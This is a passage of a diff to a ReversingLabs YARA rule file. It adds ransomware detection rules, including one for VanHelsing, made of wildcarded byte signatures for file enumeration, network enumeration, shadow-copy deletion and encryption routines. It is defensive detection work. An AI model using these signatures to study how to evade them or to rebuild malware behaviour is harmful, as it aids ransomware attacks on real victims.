+            ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 2B ?? 07 6F ?? ?? ?? ?? 0D 00 00 09 03 28 ?? ??
+            ?? ?? 13 ?? 11 ?? 2C ?? 00 7E ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 26 00 00 DE ?? 26 00 00 DE
+            ?? 00 07 6F ?? ?? ?? ?? 2D ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 2A
+        }
+		$find_files = {
+            00 73 ?? ?? ?? ?? 0A 00 28 ?? ?? ?? ?? 18 8D ?? ?? ?? ?? 25 16 28 ?? ?? ?? ?? A2 25 17
+            72 ?? ?? ?? ?? A2 17 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 2B ?? 12 ?? 28 ??
+            ?? ?? ?? 0C 00 06 08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE
+            ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 06
+            0D 2B ?? 09 2A
+        }
+		$get_file_list = {
+            00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 2C
+            ?? 00 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 38 ?? ??
+            ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B
+            00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 12 ?? 28 ?? ?? ?? ?? 0D 00 07 09 6F ?? ??
+            ?? ?? 00 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
+            DC 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 00 00 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "John W.Richard" and pe.signatures [ i ] . serial == "3e:16:56:df:ca:ac:fe:d7:c2:d2:56:43:55:69:8a:a3" and 1385251199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $get_file_list ) and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4Bf1D68E926E2Dd8966008C44F95Ea1C : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Vanhelsing : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects VanHelsing ransomware."
 		author = "ReversingLabs"
-		id = "c82170a4-911c-5206-bae8-6503a5449df9"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "a12c5a00-523b-5644-aac5-e0f9d7e779b5"
+		date = "2025-06-10"
+		modified = "2025-06-10"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2880-L2896"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "44b5aae8380e3590ebb6e2365e89b3827432e8330e5290dc8f8603a00bcf62f6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.VanHelsing.yara#L1-L464"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8a04dac3ede0d2fb63db8f97fc20bb83372a2adf5e760ea7c29e5f563cee7442"
 		score = 75
-		quality = 90
-		tags = "INFO, FILE"
+		quality = 88
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "VanHelsing"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_v1_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1
+            ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ??
+            8B 45 ?? 8B 5D ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 53 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 50 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D
+            85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 75 ?? FF 15 ?? ?? ??
+            ?? 50 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B
+            3D ?? ?? ?? ?? 0F 1F 00 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? F7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 8D 85 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? BE ?? ??
+            ?? ?? 66 0F 1F 44 00 ?? FF 36 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 85 ?? ?? ?? ?? 83
+            C6 ?? 81 FE ?? ?? ?? ?? 7C ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85
+        }
+		$find_files_v1_p2 = {
+            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B CB E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
+            8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ??
+            ?? BE ?? ?? ?? ?? 66 0F 1F 44 00 ?? FF 36 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 85 ??
+            ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ?? 8D 85 ?? ?? ?? ?? 50 53 8D 85 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 89 9D ?? ?? ??
+            ?? 89 9D ?? ?? ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 0F 57 C0 83 C4
+            ?? 66 0F D6 06 C7 46 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? 89 06 8B 85 ?? ?? ?? ?? 89 46 ?? C7 46 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B CE 85 C0 75 ?? E8 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 53 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 9D ??
+            ?? ?? ?? 83 C4 ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89
+            0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D
+        }
+		$network_enumeration_v1_p1 = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
+            ?? ?? 53 56 57 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50
+            E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? 83 3A ?? 0F 8E ??
+            ?? ?? ?? 33 DB 89 5C 24 ?? 0F 1F 00 8D 42 ?? 03 C3 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 15 ?? ?? ?? ?? 8B C3 BB ?? ?? ?? ?? 89 44 24 ?? 83 C4 ?? 89 5C 24 ?? 8D 72 ?? 03
+            F0 8B CE 8D 79 ?? 8A 01 41 84 C0 75 ?? 2B CF 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D
+            84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 6A ?? 50 6A
+            ?? 8D 84 24 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ??
+            ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ??
+            ?? ?? ?? 75 ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 8D 44 24 ?? 50 6A ?? 8D 44 24 ?? 50 6A ?? 8D 44
+            24 ?? 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 33
+            FF 39 7C 24 ?? 76 ?? 33 F6 8B 44 24 ?? 83 7C 06 ?? ?? 75 ?? 68 ?? ?? ?? ?? FF 34 06
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 44 24 ?? FF 34 06 8D 44 24 ?? 50 8D 84 24 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 8D 4C 24
+        }
+		$network_enumeration_v1_p2 = {
+            68 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 47 83 C6 ?? 3B 7C 24 ?? 72
+            ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 81 FB ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 15 ?? ?? ??
+            ?? 8B 5C 24 ?? 8B 44 24 ?? 05 ?? ?? ?? ?? 83 EB ?? 89 44 24 ?? 89 5C 24 ?? 0F 85 ??
+            ?? ?? ?? 8B 74 24 ?? 8B 5C 24 ?? 46 81 C3 ?? ?? ?? ?? 89 74 24 ?? 89 5C 24 ?? 3B 32
+            0F 8C ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 3A ?? C7 44 24 ?? ?? ??
+            ?? ?? 0F 8E ?? ?? ?? ?? 33 DB 89 5C 24 ?? 66 0F 1F 44 00 ?? 8D 42 ?? 03 C3 50 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B C3 BB ?? ?? ?? ?? 89 44 24 ?? 83 C4 ??
+            89 5C 24 ?? 8D 72 ?? 03 F0 8B CE 8D 79 ?? 8A 01 41 84 C0 75 ?? 2B CF 0F 84 ?? ?? ??
+            ?? 56 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            8D 44 24 ?? 6A ?? 50 6A ?? 8D 84 24 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85
+            C0 75 ?? FF 15 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 8D 44 24 ?? 50 6A ?? 8D
+        }
+		$network_enumeration_v1_p3 = {
+            44 24 ?? 50 6A ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 81 FB
+            ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 33 FF 39 7C 24 ?? 76 ?? 33 F6 0F 1F 84 00 ?? ?? ?? ??
+            8B 44 24 ?? 83 7C 06 ?? ?? 75 ?? 68 ?? ?? ?? ?? FF 34 06 E8 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 75 ?? 8B 44 24 ?? FF 34 06 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 50 8D 84 24
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 47 83 C6 ?? 3B 7C 24 ?? 72 ?? FF 74 24 ?? FF 15 ?? ??
+            ?? ?? 81 FB ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 5C 24 ?? 8B 44 24 ??
+            05 ?? ?? ?? ?? 83 EB ?? 89 44 24 ?? 89 5C 24 ?? 0F 85 ?? ?? ?? ?? 8B 74 24 ?? 8B 5C
+            24 ?? 46 81 C3 ?? ?? ?? ?? 89 74 24 ?? 89 5C 24 ?? 3B 32 0F 8C ?? ?? ?? ?? 68 ?? ??
+            ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 83 C4 ?? 33
+            C0 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$delete_shadow_copies_v1_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 6A ?? 6A ?? FF 15
+            ?? ?? ?? ?? 85 C0 79 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B
+            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A
+            ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 79 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF
+            15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8D 85 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 6A
+            ?? 68 ?? ?? ?? ?? FF D7 85 C0 78 ?? 68 ?? ?? ?? ?? FF D3 8B F0 8D 85 ?? ?? ?? ?? 50
+            FF 15 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 11 56 51 FF 52 ?? 8B F0 8D 85 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? 85 F6 0F 88 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF D7 85 C0 79 ?? 50 68
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF D3 8B 8D
+            ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 8B 11 6A ?? 6A ?? 6A ?? 6A
+            ?? 6A ?? 56 51 FF 52 ?? 56 8B F8 FF 15 ?? ?? ?? ?? 85 FF 79 ?? 57 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 8B 08 50 FF 51 ?? E9 ?? ?? ?? ?? 6A ?? 6A ??
+            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 79 ?? 50 68
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 8B 08 50 FF 51 ?? 8B 85 ?? ??
+            ?? ?? 50 8B 08 FF 51 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 68 ?? ?? ?? ?? 8B F8 FF
+        }
+		$delete_shadow_copies_v1_p2 = {
+            D3 8B 8D ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 6A ??
+            8B 11 6A ?? 56 57 51 FF 52 ?? 57 8B 3D ?? ?? ?? ?? 8B D8 FF D7 56 FF D7 85 DB 79 ??
+            53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 8B 08 50 FF 51 ?? 8B 85
+            ?? ?? ?? ?? 50 8B 08 FF 51 ?? E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 01 8D 95 ?? ?? ?? ?? 52 8D 95
+            ?? ?? ?? ?? 52 6A ?? 6A ?? 51 FF 50 ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 6A ?? 52 8B 08 6A ?? 68 ?? ?? ?? ?? 50 FF 51 ??
+            FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D3 83 C4 ?? FF B5 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 8B F8 8D 85 ?? ?? ?? ?? 0F 57 C0 57 56 6A ?? 6A ?? 6A ?? 6A ?? 6A
+            ?? 6A ?? 50 6A ?? 0F 11 07 FF 15 ?? ?? ?? ?? 6A ?? FF 37 FF 15 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            50 8B 08 FF 51 ?? 8B 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 85 C9 0F 85 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 08 FF 51 ?? 8B 85 ?? ?? ?? ?? 50 8B 08 FF 51 ?? 8B 85
+            ?? ?? ?? ?? 50 8B 08 FF 51 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 5F 5E 33 CD
+            5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_v1_p1 = {
+            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
+            ?? 64 A1 ?? ?? ?? ?? 50 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45
+            ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F9 89 BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 37 83 C4 ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 0F 57 C0 C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48
+            ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 6A ?? 56 8D 8D ?? ?? ??
+            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ??
+            8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? ?? ?? ?? 74 ?? FF
+            15 ?? ?? ?? ?? 50 FF 37 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 E9
+            ?? ?? ?? ?? 6A ?? 83 EC ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 8B 8C 05 ?? ?? ?? ?? 85 C9 74 ?? 8B 01 FF 50
+            ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? C6 45 ?? ?? 8B
+        }
+		$encrypt_files_v1_p2 = {
+            85 ?? ?? ?? ?? 8B 48 ?? F6 84 0D ?? ?? ?? ?? ?? 75 ?? 8B 8C 0D ?? ?? ?? ?? 8D 95 ??
+            ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 01 6A ?? 52 FF 50 ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? EB
+            ?? 0F 57 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 11 85 ??
+            ?? ?? ?? C6 45 ?? ?? 8B 40 ?? 8B 8C 05 ?? ?? ?? ?? 85 C9 74 ?? 8B 01 FF 50 ?? 6A ??
+            C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 83 EC ?? 03 BD ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B B5 ??
+            ?? ?? ?? 8D 45 ?? FF 76 ?? 6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 45 ?? FF 76 ?? 6A ?? 6A ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ??
+            ?? ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50
+            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 6A ?? FF 36 E8 ?? ?? ?? ?? C6 45 ?? ?? 8B
+            85 ?? ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 33 F6 E9 ?? ?? ?? ?? 51 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ??
+            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 90
+            8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 6A ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 90 8A 01 41 84
+            C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 6A ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
+        }
+		$encrypt_files_v1_p3 = {
+            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 8B 42 ?? 8B 8C 05 ?? ?? ?? ?? 85 C9 74 ?? 8B 01 FF 50 ?? 8B
+            95 ?? ?? ?? ?? C6 45 ?? ?? 8B 4A ?? 83 BC 0D ?? ?? ?? ?? ?? 75 ?? 8B 8C 0D ?? ?? ??
+            ?? 85 C9 74 ?? 8D 85 ?? ?? ?? ?? 3B C8 74 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 4A
+            ?? 8B 84 0D ?? ?? ?? ?? 85 C0 0F 94 85 ?? ?? ?? ?? C6 45 ?? ?? A8 ?? 75 ?? 8B 8C 0D
+            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 01 6A ?? 52 FF 50 ?? C6 45 ?? ??
